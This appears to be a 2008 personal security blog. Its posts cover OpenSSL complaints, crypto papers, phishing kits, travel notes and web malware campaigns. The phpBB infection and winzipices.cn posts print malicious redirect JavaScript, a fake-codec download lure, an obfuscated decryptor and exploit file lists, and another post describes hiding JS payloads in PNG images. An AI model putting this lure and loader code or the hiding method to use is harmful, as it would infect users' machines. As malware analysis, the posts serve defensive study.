Currently again in Madrid

Sorry guys, can't post any new content at the moment. I'm visiting a friend of mine studying in Madrid. Anyway, this is a really nice city and totally different from what I've seen so far.

New chances for hiding malicious JS?

Recently I talked to an old friend from Germany, Aimster (in da house :D), who sent me interesting links about JS obfuscation possibilities with pictures.
On the first view, the intention isn't to obfuscate JS but to compress it. I quote you the test results, quite impressive:

prototype-1.6.0.2.js
123 KB Javascript compressed to 30 KB PNG (24%)

jquery-1.2.3.min.js
53 KB Javascript compressed to 17 KB PNG (32%)

excanvas.js
24 KB Javascript compressed to 8 KB PNG (33%)

excanvas-compressed.js
10 KB Javascript compressed to 5 KB PNG (50%)

dijit.js
46 KB Javascript compressed to 16 KB PNG (35%)

Concerning obfuscation, I see a high possibility to just put the malicious JS into the image file, compressed, and store it on one of these image hosting pages. The bad boys would then only need to implement the reading() functions, refering to the image on the image host. Therefore, reverse engineering would be a little more complicated.
I mean, it is of course not impossible to retrieve the malicious JS from the image, but it would be another step forward to a more sophisticated obfuscation.

The next thoughts were: What would image hosting provider like ImageShack say about the corrupted file? I took the image file from Jacob and uploaded it to ImageShack.


Everything went fine with the upload, so indeed, it is possible for bad boys to spread their payload all over the internet in a "legal" way. So, for instance, the recent FlashPlayer attacks could be hidden in image files all over the internet ... only the reading function would be left on the infected servers for injecting potential clients.

On Jacob's page, you find the source for a PHP script which embeds JS into png files. Afterwards, you need to convert it to a 8-bit image file and there you go ... you have your "infected" image file.

Malzilla: Malware hunting tool

I just had a fast look at "malzilla", a tool which helps you identifying and analysing malware. The binary for windows as well as the source can be found here, several documentation files here.
For the first look, it's quite useful, although the JS decoder function didn't work for my example JS code. I mean, if the source is getting more abstruse, this tool is quite useless.

Anyhow, nice idea, nice tool! Give it a try! :D

Bloody sun sets ...

PLA Radio - take the mick out of voice authentication

I recently listened to the new PLA radio podcast on my way back home from work. Ha, nice one! Pranking a banks voice authentication system by calling and recording a victim's voice!

Like the guy in the radio says:
They don't relay on something you know ... they relay on something you have! Where is the f***ing two-way authentication?

Perhaps this is why biometric authentication can end in evil scenarios?
By the way, PLA is always worth a look.

OpenSSL -hash is a synonym for "hash"

The more I work with this openssl ?crap?, the more I begin to hate it!
For instace:

openssl x509 -hash -noout <>

Does what exactly? If you call the manpage for x509 and query for -hash, you get a very informative answer: synonym for "-hash'" for backward compatibility reasons.
Great! And this means? I mean, I'm really sorry if I'm just too stupid to understand that but this doesn't make sense, does it?

In fact, it returns an 8 character md5 hash or better, a part of it. Ok! Why? Which part in the manpage tells me so?

I'd like to introduce my new friend ...

More conspiratorial issues soon - stay tuned!

Chosen Message Attack (CMA) on Nyberg-Rueppel Signatures

The Nyberg-Rueppel (NR) signatures scheme especially focuses on the size of input and output values. This could be quite important concerning channels in which you haven't much place left to embed huge signatures like RSA (1024 - ... open end).
In addition, Nyberg-Rueppel signatures provide message recovery which means, the original message can be extracted out of the signature. NR signatures are perfectly suitable for messages shorter then ten bytes but leave unanswered the question of dealing with messages, of, say, fifteen bytes.
Unfortunatelly, NR signatures are vulnerable to CMA. How this attack works, I wonna show you here. I hope, I didn't make any mistakes :D Otherwise, please drop me a comment:

Converting stuff online - Zamzar.com

Today I tried to read a broken pdf with evince, but each time I reached the 4th page, evince collapsed. I trief xpdf with the same result. I started my VM in order to boot windows, tried the same with Adobe $Mafiasoftware and you know what? It collapsed.
So, I told myself: Why not converting it? I went to zamzar.com and converted the pdf to image, to doc, to pdf (yes, pdf to pdf :D) and pdf to pdf did well. I could read the whole pdf without any errors. Great ... but in fact, that's not the service the zamzar.com guys offer. Here we go ... to which kind of format do you want to change?

And yes, all for free! Nice one!

TJX employee fired for exposing shoddy security practices

What exactly is TJX?

The TJX Companies, Inc. is the leading off-price apparel and home fashions retailer in the U.S. and worldwide, with over $17 billion in revenues in 2006, eight businesses, and more than 2,400 stores.

OK, I'm impressed.
What indeed didn't impress me was the fact, that TJX fired some exployee who had the heart to talk about holey security policies at TJX. The interesting story about the whole thing was, that the fired employee talked about that on sla.ckers, one of the best forums for web application security. I can also remember of having read the first posting in August 2007, but didn't pay more attention to that discussion.
So in the end, the employee perhaps took the wrong way of disclosure.

If you need some more information about the TJX data leak, you can find it here and here.

Sunset over San Sebastian

Thx to Pascal for the pictures ... your "brute force picture taking" roxx :D

Tool for Safe E-Banking on Infected PCs

Ohh no, please don't!
So now the guys who are behind the ZoneAlarm personal firewall (packet filter?) try to publish a tool which would allow customers to bank online safely at ING, even if the user's PC was already infected with data-stealing malicious software.
This is grown on a partnership between ING and Trusteer, an israeli company.

Actually, it will create "a secure pipe" between the client system and the ING server. In addition it tries to take over the control of windows APIs which are responsible for SSL handshakes etc.
If malware is detected, the new magic software will try to block it! Great!
And tomorrow I'll run for spanish presidency! :D

Quote blog.washingtonpost.com

Online trading firm Ameritrade tried something similar a few years back with a product from WholeSecurity (since purchased by Symantec), but the offering was never really publicized that well and the program seemed to fade away after a while.

Security Talk in Hamburg in June

A friend of mine and I are invited to Hamburg in order to talk about some security concerns at a huge company. Unfortunatelly, my mate won't come with me due to time-management reasons, so I've to go on my own.
Perhaps anyone will also be in Hamburg around the 1st weekend in June and want's to meet for a beer?? :D

It's safe to be here

With google safebrowsing you can check pages whether serving malware or not. This page is safe :D *fg* as well as the code-foundation.de.
However, I wouldn't lay too much trust in this "safebrowsing" crap. Anyway, the whitehouse.org page is already listed :D

FPGA - for normal people

I don't if you follow the recent discussions about A5-cracking with FPGAs, I do. It's interesting and it scares me too. :D
Perhaps I have to get into FPGA stuff soon due to some reasons, so I came across a very usefull page for all kind of topics concerning FPGAs.

Aahh by the way: anybody played already with the new Roku Netflix Player?
It's a video streaming box for home users ... nice one, but the quality shouldn't be as high as DVD.

Debian OpenSSL PRNG italian target list available in the wild

It seems like the bad script kiddies also don't sleep at night. I recognized several lists of scans on forums and pages concerning the recent OpenSSL flaw.

Fooling the bad boys - playing around with phishing scripts

F-Secure recently posted a story about a careless company and their problems with hosting phishing pages. I just had a closer look on what happened there ...

First of all, it is a Mr-Brain Script ... you remember these guys from Morocco who are blaimed to insert a "backdoor" into their scripts so that all phished data is also sent to them?
Anyway, these scripts are poorly written and easy to fool, like it seems.

I got the source and had a closer look on this Mr-Brain.php scripts, which intends to send the data to the phishers after all forms are correctly filled.

I have to admit, I like their humor. :D "Come to Papa my Sweet Dollars". lol
Obviously, they really made sure that the phished credentials will reach them by using 4 different emails.

So, the stupid thing concerning this script is the fact, that you can call it directly /Mr-Brain.php. Then the script will complain with Warning: gethostbyaddr(): Address is not a valid IPv4 or IPv6 address in.
Ok, so let's just give it a real IP by calling the script like /Mr-Brain.php?ip=123.123.123.123 and this works.

PHP is stupid. If $ip is not set, it will use the GET-variables. In this case, it could be useful for "spamming" the phishers, but normally it's just stupid.
What about this one?

/Mr-Brain.php?ip=123.123.123.123&user=victim&dob=05.06.08&securityno=1234567 ...
The bad boys who will check their emails won't distinguish between the emails sent through this URL directly or the real phished ones ... just think about it! :D

Google (Unst)Health

This is really insane! Google opened a new service called "google health". Let me quote what it is for:

Google Health puts you in charge of your health information. It's safe, secure, and free. Organize your health information all in one place. Gather your medical records from doctors, hospitals, and pharmacies. Keep your doctors up to date about your health. Be more informed about important health issue

Omfg ... I mean, I had bad dreams when I changed to blogspot, but giving "real" private data to google? Do I want my health data on google webservers? I don't think so! Do I want to put my health data on any other webserver? I don't think so!
Shall I remind you of these nice packages which call themselves "g00gle phishing packages" and which are perfectly made for old people which perhaps wonna use google health?
Ok, forget lame phishing. I wonna quote B.Schneier:

Whenever you put data on a computer, you lose some control over it. And when you put it on the internet, you lose a lot of control over it.

This concerned facebook but isn't it true in this case also?

New Phishing Releases

Like all the other versions before, this release also contains a backdoor which sends the phished credentials to an "untrusted" third party. No, like I already said before, this isn't something new.

The Paypal.com scam tops all the other packages packages concerning the size. Pretty strange ... why didn't they use the new XSS? *fg*

openssl too stupid to verify hex signatures?

I can't believe that! I already asked fippolino in order to get more detailed information but like it seems, openssl can't verify signatures in hex format.
First we sign ... and we put the output in hex format!

openssl dgst -sha1 -sign key.pem -hex -out signature foobar

So, now we wan't to verify:

openssl dgst -sha1 -verify pk.pem -signature signature foobar
Verification Failure

Impossible. Why the hell can I create hex signatures if I can't verify them? man dgst doesn't tell me something about that. Due to the mailing list, this "feature" should be documented or already solved, but it isn't. Eiei ... openssl, quo vadis?

"I Was A Teenage Bot Master" - theregister.co.uk

Last night I read "I Was A Teenage Bot Master" on theregister.co.uk. Very interesting story of two young men who didn't know when to stop illegal business or when they've reached their limits.
They attracted attention because their software scanned a government subnet. LOL.

SoBe and Ancheta's software ended up infiltrating machines belonging to the China Lake Navel Air Facility, the Defense Information Security Agency and Sandia National Labs.

In fact, these guys were crazy:

Ancheta "hey btw there are gov/mil on the box if you want to get rid of them," Ancheta responded "rofl," according to court documents.

So, ROFL was the only thing he could answer. :D
Actually, they were just a little bit lazy with hiding their traces ... leaving personal information on servers which were also used for C&C! Crazy! You really don't have to wonder if you get blown up.

One of these guys likes riding his motorcycle and he tried to stop dirty-hacking a few times but always failed. So here's why:

"im pretty bored, weather has sucked lately, only done like 50 miles of riding in 3 days now. gonna start on a new bot."

Mwaha! Hacking is a drug!

2700x Newsletter

On molemag.net interested people can get the latest information about ISO 2700x. I really think it's worth looking at for a few moments.

Debian OpenSSL Fiasko

Haha! No guys, this is definitely not funny! :-|
Source: http://blog.joelesler.net/2008/05/debian-ssl-comic.html

KUL and SANS cooperation for safe programmers

There is an official statement that the KUL and the SANS Software Security Institute (SANS-SSI) are going to cooperate in order to "produce" more safe programmers.
This cooperation could be quite powerful due to the fact that academic research and practical experience will be very well mixed. Perhaps my the HGI should also search for a suitable partner ...

PHP Obfuscator

I know, it is weekend but the bad guys also don't sleep. :D



So, the newest webapp I came across was this nice "PHP Obfuscator" for clouding PHP code on command.
We all know that in most of the cases, used exploits were packed in obfuscated JS for evading detection. Normally this concerns the client side only. So called "Web Exploit Toolkits" (WETs) like MPack, IcePack, NeoSploit etc. however can be detected by for instance "greping" for known patterns in one of these WETs on the webserver.
The newest trend is to obfuscate also the source on the webserver. Several PHP-shells, which were originally used for helping administrators and not for 0wning RFI vulnerable boxes in the wild, use this method for staying undetected. Search for the C99-Shell for further information.

Scamers fight themselves - you fight me, I fight you

While I'm waiting for my 4096-bit DH parameters to be generated (Generating DH parameters, 4096 bit long safe prime) I came across a strange story:

Well, it isn't new to the public that scamers, phishers and all these scum have no moral. They fight each and any entity in order to enrich themselves. We heard that recently with the modified phishing-kits (by the way, this is an old story, these kits were already modified years ago, but anyway...) and now I followed an announce for a PHP mass mailer on an owned box which was in fact infected itself. Some guy was trying to sell it on a forum.
The script looked like this:

As you can obviously see, the mass mailer was infected. A short view on the source, and the story was clear:

These guys in fact don't have a moral and I don't know if I should laugh out loud or just cry. :D

Review: Browser-Based Attacks on Tor

I had the time to read "Browser-Based Attacks on Tor", a paper released by Tim Abbott, Katherine Lai, Michael Lieberman and Eric Price from the MIT.
It shows a new method for attacking anonymity provided bei the TOR network through JS. Several other attacks with malicious Flash, ActiveX and other crappy plugins exist. The paper was released in 2007, so don't expect it to be up to date.
I have to admit, that the paper is clearly structured and well written. Well done!

But ... concerning today's knowledge, each person who tries to secure his or her privacy should know, that JS, Flash, ActiveX etc. is evil! Just evil! It hurts your damn browser and in this particular case also your privacy.
So, use TOR with NoScript, try to get rid of IE and other M$ stuff ... and enjoy freedom of speech.

It's weekend guys - nerdy music

Get off the computer, leave the nerd world, get out into the sun, have some phun and meet other people. :D
If this poses a real challenge for you, do it step by step and listen to some nerdy music first.

MySpace Phishing mixed with Malware

This isn't something new, but perhaps worth to be posted. MySpace phishing is quite common, we all know that. This time I came across a MySpace phishing website which serves malware binaries too.


By submitting credentials into the form fields, you get directed to another .cn domain which redirects you to myspace.
The binaries are just stored there for infecting phished MySpace accounts with it. Not a bad idea at all. :D

Blast in Spain!

I didn't realise, but yesterday a vehicle in a city here in the north Spain was blown. ETA? Currently nobody knows ... but obviously the people here don't give a shit.

Powerful crypto with PHP?

PHP can suck, we all know. But I recently read an interesting article about further functions of PHP concerning crypto.
Encrypting Large Data with MCrypt, Building Hashes with MHash, Using the Crypt_RSA PEAR Package and Generating Secret Keys with the Crypt_DiffieHellman PEAR Package. :D

All in all the code looks quite handy ... however after the recent debacle of openSSL and the buggy PRNGs, I !really! wouldn't trust PHP. :D

Goohack - WTF?

Source: goohack.com

Yes, you'll gonna ask yourself wtf this "goohack" means. I had the same reaction like you currently have. But goohack is quite easy to understand.
Here a short quote:

Goohack was created by Max from Zedomax.com to make life easier for finding DIYs, hacks, howtos, gadgets, and anything technololgy related.
Goohack brings you only the best of hacks and howtos on the web, powered by Google's custom search API.

So again the google mafia, but I already find some nice gadgets through this page. Perhaps it could be useful for the technical geeks.

Just FYI: Phone Number changed

I got a spanish mobile number, just fyi! Contact me by email or xing in order to get it. You currently won't reach me over the old german one.

winzipices.cn analysis - malware goes around

Shadowserver.org released yesterday a statistic of all domains which are currently involved into the ongoing mass SQL injections. Pretty interesting to see how much .cn domains are involved. Anyway, our friend for tonight is called winzipices.cn aka computershello.cn aka 60.191.239.221:

If you visit /, nothing special happens but three ones are displayed. Great! If you search for this domain on google, you ill realise, that most of the reference files are /1.js and /4.js, so we start with them.

This file tries to redirect you to 6.htm. But 6.htm returns a chinese 404 page. So we go back and try /4.js which returns frame references to pp.htm and test.htm.
pp.htm tries to load a javascript called pp.js. test.htm tries to load a javascript which is called qq.asp.
With pp.js we start at first into the mysterious world of browser infection routines. If the JS detects your browser as a IE6 or IE7, you get redirected to 6.gif, which exactly isn't a gif at all but a ascii file with JS itself. Anyway, if you use FF, you just get a blank page displayed. All in all pretty stupid to differentiate between IE6 and IE 7, but who cares.

Before we will have a look at 6.gif, we go back and check out what happens at the visit of qq.asp:
qq.asp tries to redirect you to hxxp://computershello.cn/f.js where the whole joke starts again from the beginning. In addition, a alert-box says "hello asp." to you and an IFrame is loaded which refers to baidu.com. This all doesn't make sense at all ... but anyway.
I tried just for fun what happens if I call the hello.asp. :D And yes, you can enter a formfield:

So we check out 6.gif. This file is called 6.gif due to some "features" which some version of the IE contain. JS code inside gifs is also interpreted.

So this "gif" is full of IFrames. le.htm, vv.js, old.htm and xin.htm. Let's start with le.htm:
This file tries to make you download "hxxp://computershello.cn/test.exe" by using obfuscated javascript:

document.write(decrypt(hk,"3800"))
function decrypt(str, pwd) 

vv.js however exhibits a nice first row:
So we are deeply stuck into obfuscated JS files like we can see in the other files which all try to use obfuscated JS in order to exploit the browser.
Another interesting file is /config.txt which is possibly the config file for the malware.

Total list of referenced websites:
1.js
4.js
pp.htm
test.htm
pp.js
qq.asp
hello.asp
6.gif
le.htm
vv.js
old.htm
xin.htm
config.txt

PS: The binary was not analysed but I'm sure more interesting information can be extracted by doing so.

ARggh, bloody Debian - predictable PRNGs in Debian

Just got the news that several Debian distributions exhibit predictable PRNGs. Quote:

This is a Debian-specific vulnerability which does not affect other
operating systems which are not based on Debian.  However, other systems
can be indirectly affected if weak keys are imported into them.

So don't forget to create new keys .... :-(

Chinese Hacker Tea House

I recently read a funny story on thedarkvisitor.com (by the way, very juicy content on this blog ... bookmark!) about a chinese hacker tea house. Today, I again stumbled across almost the same content so I decided it is worth to be mentioned here.
By the way, are there any german hacker beer houses out there? :D Don't refer to the "Hofbräuhaus" in Munich!

Source of the picture: thedarkvisitor.com

FirePack adjusted to chinese customers

Dancho just said that the FirePack is adjusted to chinese customers. This means in this case, the FirePack language file is also translated to chinese. The current versions out in the wild are available in russian und english ... and now in chinese. This opens perhaps a new market down in south east asia.

Book review: Understanding PKI: Concepts, Standards, and Deployment Considerations (2nd edition)

I recently finished reading Understanding PKI: Concepts, Standards, and Deployment Considerations. What a great book! You really think that you've learned a lot during all the time you studied this book ... and in the end you think about what you just read and the whole thing about PKI crap was made a little bit clearer.
However, I have to admit, that I skipped a few pages about some political topics which indeed bored me, but the rest was great.
A topic, which specifically interested me was for instance the Relying Party Notification Problem.
What happens if the CA´s private key is compromised?? Or what are the different trust models concerning PKI?
Of course, topics like Electronic Signature Legislation shouldn't be missed.

If you get nearer to the end, topics like What PKI Does Not Do were dicussed and pretty well explained.
What I really learned and what you also should remember forever: A party a doesn't trust a party b ... it just trusts the corresponding CA. So a PKI does not create unique names for entities; it does not attempt to solve the entity-naming problem. This is quite a common
misunderstanding. The job of the CA is not to create names but to bind key pairs to names.

The book closes with considerations of deployment.

Mass PhpBB Download Infection demystified?

SANS is talking about it, also some other blogs ... I just had a short look at the myrmidons. First of all, there are abviously two evil boys hanging out in the wild ... looking for suitable victims:
hxxp://xprmn4u.info/f.js
hxxp://free.hostpinoy.info/f.js

Now let's do some simple math and search for both URLs. Subsequently, sum up both amounts of found websites:

So for xprmn4u.info/f.js we get approximately 225.000 infected websites, for free.hostpinoy.info/f.js around 188.000 which makes a total sum of 413000 infected websites!

So the next step is to look at the infection routine. free.hostpinoy.info/f.js tries to lure you on another webpage with the help of stupid JS:

window.location=("http://free.hostpinoy.info/go.php?sid=1");

(xprmn4u.info/f.js couldn't be reached at the time of writing)
This JS or better the go.php site has one function: It acts like a load balancer for the payload pages. For sid=1 I got redirected to hxxp://porn-look.net/**{snipped} but another Domain was for instance hot-adulttube08.com.

Now the interesting part follows:
Depending on which browser you use or respectively which User-Agent your Browser uses, you are served with a different malware (codecmega4254.exe). The user is told to download an additional codec in order to view a great video. If your User-Agent carries M$-identifying attributes, you are served with a nice exe file.
I normally camouflage as a windows system due to the fact, that you don't miss a fucking exploit out there. :D Linux user in this case go away empty-handed.

Here is the interesting part: Mac OS X users be aware! :D DMG-file for all the Mac users out there. :D
What I like here is the fact, that the authors really made an effort. You get a different layout for each browser version. M$ guys "only" get You-Tube, Mac guys and get special made Quicktime layout. :D Very nice ...

What I highly recommend is this function:

function vc() {
    if (confirm('Video ActiveX Object Error.\r\rYour browser cannot play
 this video file.\rClick \'OK\' to download and install missing Video
 ActiveX Object.')) {
         location.href='hxxp://codecmega.com/download/codecmega4254.exe';
    }
    else {
         if (alert('Please install new version of Video ActiveX Object.')) {
              vc();
         }
         else {
              vc();
         }              
    }
}

Haha, yeah, my browser can't display this video file. Ok ... thanks. By the way:
The owner of codecmega.com, Mr Tiffany Seifert, is already a known boy out in the wild. His domain popcodec.net was involved in some recent IFrame attacks.

Spanish life

Just a few random pics for u to get in touch with my current spanish lifestyle:

Guess what this is? I think the most kinky food I've ever seen: Toast without crust - stripped toast, indeed! View on right beach of San Sebastian

Sunset

New paper deletes text after 24 hours

A company named Xerox claims to have invented a new kind of "secure" paper. This kind of paper destroys written words after a time of 24 hours automatically. According to pcadvisor, the paper is also reusable and can be used up to 100 times.
Quote from pcadvisor:

The paper contains specially-coded molecules that create a print after being exposed to ultraviolet light emitted from a thin bar in a printer. The molecule readjusts itself within 24 hours to its original form to delete the print, or heat can readjust the molecule instantly.

Sardinia 2007/2008 pictures released

I had a great time together with 2 friends on a small island called Sardinia. We spent 10 days there, did some backpacking and trekking and really enjoyed it!
The pictures from Sardinia can be viewed here, more pictures from my other trips can be seen here.

Free Malware Creation Software out there

It's impressive to see how easy it is nowadays to create malware for infecting victim systems. In this post I just want to show you how easy it is to create malware. I really don't know if all the listed functions really work and escpecially these "disable" functions are really scary. What do the AV guys do against this?
These tools are out there in the wild ... waiting for being downloaded and used by script-kiddies in order to take over the Internet. You must see, that your AV software in most of the cases can't protect you!

0day treasure hunt: researcher hides IE attack on Web

There were some rumours about Avi Raff who claims to hide a 0day for IE7 and IE8 on his blog. Not a bad idea for increasing the own blog traffic. :D But currently nobody knows what's behind that story.
You should take a look at the comments on Raff's page ...

Rule the world with your iPhone

How to command high end surveillance with your iPhone:



More information here.

Malware talk at the Ai3/BSI symposium

Due to a request, I just wanted to tell you that my slides are not public right now. Perhaps I will publish them later this year, but currently I only release them on request. Sorry ...

News, news ... news?

Heise.de, the german news portal announced today a news about florishing internet trade of stolen business credentials. Is this news really new? If you ask me: no.

So called Phishing Kits are free for download since the very first beginning of phishing itself. Why? Because most of these phishing kits are pretty primitive scripts with no real brain behind. Also, credit card accounts can be found for sale all over the internet if you know where to search.



So I really can't understand why our AV guys have nothing else to do then published stuff which anyone whos interested in already knows. If I do that, no problem. I don't make money with publishing my crap here ... I do it just for fun.
But I really hope, that the AV companies are more up-to-date with signatures of malware than they are with publishing news. :D

By the way: There are already some all-in-one tools out in the wild ... for h4xx0ring, scaming, phishing etc ...

Videre licet

On governmentattic.org the interested reader finds things which the government normally doesn't want you to find. Sounds ugly and in fact it is. I guess it's comparable to cryptome.org.

The aim of this web site is to make available materials unavailable elsewhere. There is no topic-oriented theme to our content. If we have a theme, it is one of openness, hence our motto: Videre licet.

.:: PHRACK #65 ::.

The weekend is coming, so don't forget to read PHRACK #65 if you haven't yet. Thanks to nroej for the hint ^^.

Spread-Spectrum Watermarking of Audio Signals

Today, I get deeper and deeper into this "watermarking" stuff and currently read a paper of two Microsoft researchers, yes, M$. :D
It is called "Spread-Spectrum Watermarking of Audio Signals" and they also released a PoC. Pretty well made ...
By the way: I highly recommend the research.microsoft.com website. They have lots of interesting stuff and papers ... just for your information.

So, I never thought that the first thing I would do in order to understand the paper, is to read about biology. No joke, I did some research about the capability of the human ear. Which tones can we hear?
If you ask yourself what this has in common with "watermarking": Audio watermarking schemes rely on the imperfections of the human auditory system (HAS). So it makes sense to modify the the frequencies which humans can't hear in order to implement the watermark into audio streams? Buzzword: Psycho-acoustic frequency masking. For all german speaking readers, I recommend reading this pages from the university of Wuppertal (Germany).

"I can't get enough of your IFrames, babeee"

Unfortunatelly, I don't have time to dig deeper in this nasty IFrame jungle, but the signs tell us that the bad boys are still awake.


14.htm tries to foist a binary on you.

07004.htm serves a VML exploit.

And finally, real.htm gives you the rest with an old realplayer exploit. All in all, a well chosen trio. :D

So be aware, put your JS off ... and your brain on. Don't drink and download! Cheers!

Paper Summary: Digital Signature of Color Images using Amplitude Modulation

I recently read the paper Digital Signature of Color Images using Amplitude Modulation of Kutter, Jordan and Bossen about methods of embedding digital signatures into pictures. The beginnings of the idea is interesting:
To achieve the requirement of invisibility, the signature is embedded in the blue channel, which is the one the human eye is least sensitive to.
The problem they face is the non-symmetric embedding and retrieval functions. This means, the retrieval function is not the inverse of the embedding function. So you only get a chance of retrieving the correct signature.
Their solution is to embed the signature bit several times in order to increase the chance of retrieving.

They provide also robustness to geometrical attacks, but you can read on your own. :D

Book review: XSS-Attacks: Cross-Site-Scripting - Exploits and Defense

Written by "famous" names like Grossman, RSnake and pdp this book conveys a deep view into several XSS methods. I enjoyed it ... but after a while, XSS begins to suck a little bit.
XSS can be found everywhere ... perhaps this fact steals the magic a little bit. :D

PS: Over Laramies Corner I came across a new book called "Zero Day Threat". Sounds pretty interesting ... doesn't it?

How to implement an ISO/IEC 27001 information security management system

For those of you who are new to this field, this paper gives a lot of answers to several questions. Short quote:

The March-April issue of ISO Management Systems reported positive
user feedback on the new ISO/IEC 27001:2005 standard for information
security management systems. This follow-up article provides advice
from experts who developed the standard on how to achieve its benefits.

http://www.xisec.com/ISMS_Publications_files/implementing_27001_3-2006E-LD.pdf

Dirty Harry Pwnz them all!!11

I have the chance here in Spain to watch Dirty Harry in the evenings. Don't laugh, Dirty Harry is the Chuck Norris of the ancient times. :D
This guy is insane ... with his magnum he got them all. :)

No joke, I like watching his movies. Clint Eastwood is great ... and so is Harry!

flat search in Donostia - San Sebastian

It is really fucking hard to search for a flat here which is affordable, so here are the best chances to get one of the cheapest offers:

http://sansebastian.loquo.com/en_us
http://www.alkila.net/
http://www.easypiso.com/
http://www.pisocompartido.com/

HITB 2008 Dubai Materials out now!

Material from the HITB 2008 conference in Dubai is out now! As always, the topics are really interesting and this time, an additional soundtrack of the aftershow party is ready for download. Enjoy!

Citation for the beginning of the week

Unfortunately, people just don't spend nearly the amount of time on
the UI for their IPSec systems that they do on the crypto, so they
spoil all the hard work they've done making the implementation sound
by making it impossible for ordinary people to understand.
Perry E. Metzger - cryptography@metzdowd.com mailinglist -  a discussion about security and advantages of whether using IPsec or OpenVPN.

XSS-Proxies ... highway to hell

Today I played a little bit several XSS-Proxies. Really, I didn't realize that they are such powerful tools. I started with xss-proxy which was the first proxy published for the Shmoocon 2005 conference. After that, I played with Beef Proxy, which is totally written in PHP and much more powerful.






From the XSS-proxy FAQ page:

"I understand XSS, but I don't think it's a huge issue". I think you'll change your mind once you understand this advanced attack. Read the advanced stuff below and play with XSS-Proxy to see how evil XSS really can be.

For huge, popular pages XSS should be a concern since the latest SEO-IFrame Attacks which are based on stupid, normal, non-persistent XSS attacks. Who would have thought that this would end in such a mess.

PS: On the Beef Proxy website a small video can be watched ...

Designing protocols in LaTeX

I already blogged about that kind of topic in my old blog, but I repost it again because some friend is doing some stuff with protocols and LaTeX.
I prefer the package which Tim Storer published on his homepage. It is called protocol.sty and really can help you with designing protocols in LaTeX.

Post carrier helps customer detecting surveillance

blog.wired.com is always a good site for reading interesting stories. Kevin Poulsen wrote about a post carrier who warned his clients of being under surveillance. Nice story ... really worth reading it.

Paper: Remote Password Authentication Protocols

Pepper released a paper about remote password authentication protocols. Here is the abstract:

Password based authentication is still in widespread use, although more secure methods have been proposed and used for years. Based on the assumption that password authentication is going to stay for some more years, enhancements to the existing authentication approaches have been investigated.
This work discusses the additional requirements for protocols that must create a strong key based on a weak common secret. Existing approaches are investigated and a new technique PAKET is proposed. PAKET is very fast on the server side but requires ephermal RSA at the client, which can be relaxed depending
on the need for forward security. Unlike other proposed protocols it relies only on well understood cryptographic operations

VPN vs. the rest of the world - network measuring

You know what? I miss my university ... in detail, I miss the bandwidth :D
I use several VPN connections for different purposes. For instance, VPN to my university roxx, VPN to my Arcor DSL Uplink System suxx.
This picture shows my connection with VPN to my Arcor system.

This one shows my connection with VPN connection to my university. :D
The great thing is: If I use Skype over the Arcor VPN, you still get a real nice quality and almost no connection problems.

What you should consider before the next US visit

Before going out with my columbian fellow, I wanted to show you this nice blogpost. What are you going to do if you're planing to visit the US? Encrypt your hard drive with strong encryption? Why you shouldn't do this ... will be explained in this article.

RBN copyright

Perhaps some of you already noticed that modern malware authors add copyright information to their software. :D Sounds stupid and so it is ... but it also sounds scary.
I stumbled across another kind of "copyright" a few months ago ...

LICENCE =========================
Do whatever the fuck you want with this, legitimate or not. Modify
it, rewrite it, rename it, I honestly don’t give a crap. Just don’t
bother me if you fuck it up.
———————————————————————

HGI contact event in Bochum

For those of you who live in Bochum (Germany) and work in the IT-Security field, this information could be interesting. The HGI arranges a sort of "Business Networking Opportunities" for IT-sec students and companies in the IT-sec sector.
I would be glad if I could join this event. :-(

Race-To-Zero Bash - Fear of the AV guys?

At the upcoming DEFCON 16 there will be an additional contest called "Race-to-Zero" for passing modified malware and viruses through main AV programs. IMHO this is a nice idea.
The problem now is, that a lot of well know security guys (Ferguson, Roger Thompson) think, that the contest will do more harm than fun.

For me this is a difficult question: I don't sell AV software, I don't have to loose reputation and I really don't care if some guys meet up for beating AV software. I mean, if they don't do it at the DEFCON, they will do it elsewhere.
For me this all smells a little bit strange. Perhaps these guys from the AV section are just afraid of loosing reputation? I don't know ... but I know that they have really to do a hard job.
But I don't use AV software ... for me these programs just suck. AV software pretends to secure the client ... but actually it doesn't. Signature based AV methods are too slow ...

I know that a lot of you out there don't share my opinion and I understand that. But we will see what the future brings.

Welcome back to Domber's Basecamp - joining the google mafia now

I decided to outsource my blog due to several reasons ... more postings will come soon. Please update your RSS readers and bookmarks.